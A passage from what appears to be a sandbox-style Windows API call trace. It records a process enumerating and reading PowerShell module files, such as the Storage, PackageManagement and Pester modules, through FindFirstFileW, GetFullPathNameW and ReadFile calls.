cFileName="StorageHealth.cdxml", cAlternateFileName="")) returned 1 [0265.343] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x204c, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageJob.cdxml", cAlternateFileName="")) returned 1 [0265.343] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageNode.cdxml", cAlternateFileName="")) returned 1 [0265.343] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x800a, dwReserved0=0x0, dwReserved1=0x0, cFileName="StoragePool.cdxml", cAlternateFileName="")) returned 1 [0265.343] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageProvider.cdxml", cAlternateFileName="")) returned 1 [0265.343] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x331, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageReliabilityCounter.cdxml", cAlternateFileName="")) returned 1 [0265.344] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7853, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageScripts.psm1", cAlternateFileName="")) returned 1 [0265.344] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageSetting.cdxml", cAlternateFileName="")) returned 1 [0265.344] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb35b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageSubSystem.cdxml", cAlternateFileName="")) returned 1 [0265.344] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x223b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageTier.cdxml", cAlternateFileName="")) returned 1 [0265.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.346] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0265.346] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", lpFilePart=0x0) returned 0x3b [0265.346] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db140 [0265.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.354] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0265.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.354] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storage"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0265.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.354] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0265.354] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", lpFilePart=0x0) returned 0x3b [0265.354] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.402] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0265.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e350) returned 1 [0265.402] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x564 [0265.402] GetFileType (hFile=0x564) returned 0x1 [0265.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2c0) returned 1 [0265.402] GetFileType (hFile=0x564) returned 0x1 [0265.402] ReadFile (in: hFile=0x564, lpBuffer=0x22939e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22939e8*, lpNumberOfBytesRead=0x1b81e428*=0x5f8, lpOverlapped=0x0) returned 1 [0265.402] ReadFile (in: hFile=0x564, lpBuffer=0x2292f20, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x2292f20*, lpNumberOfBytesRead=0x1b81e428*=0x0, lpOverlapped=0x0) returned 1 [0265.403] ReadFile (in: hFile=0x564, lpBuffer=0x22939e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22939e8*, lpNumberOfBytesRead=0x1b81e428*=0x0, lpOverlapped=0x0) returned 1 [0265.403] CloseHandle (hObject=0x564) returned 1 [0265.408] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0265.408] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0265.408] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0265.408] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0265.408] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0265.408] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.408] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0265.408] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0265.408] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.409] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.409] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0265.409] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.409] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.410] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0265.410] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0265.410] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.410] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.410] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0265.410] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0265.410] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e380) returned 1 [0265.411] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0265.411] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b81de10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0265.411] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b81e020 | out: lpFindFileData=0x1b81e020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.411] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.411] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0265.412] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0265.412] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0265.412] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.412] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0265.413] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0265.413] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0265.413] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0265.413] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0265.413] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0265.413] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0265.414] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, 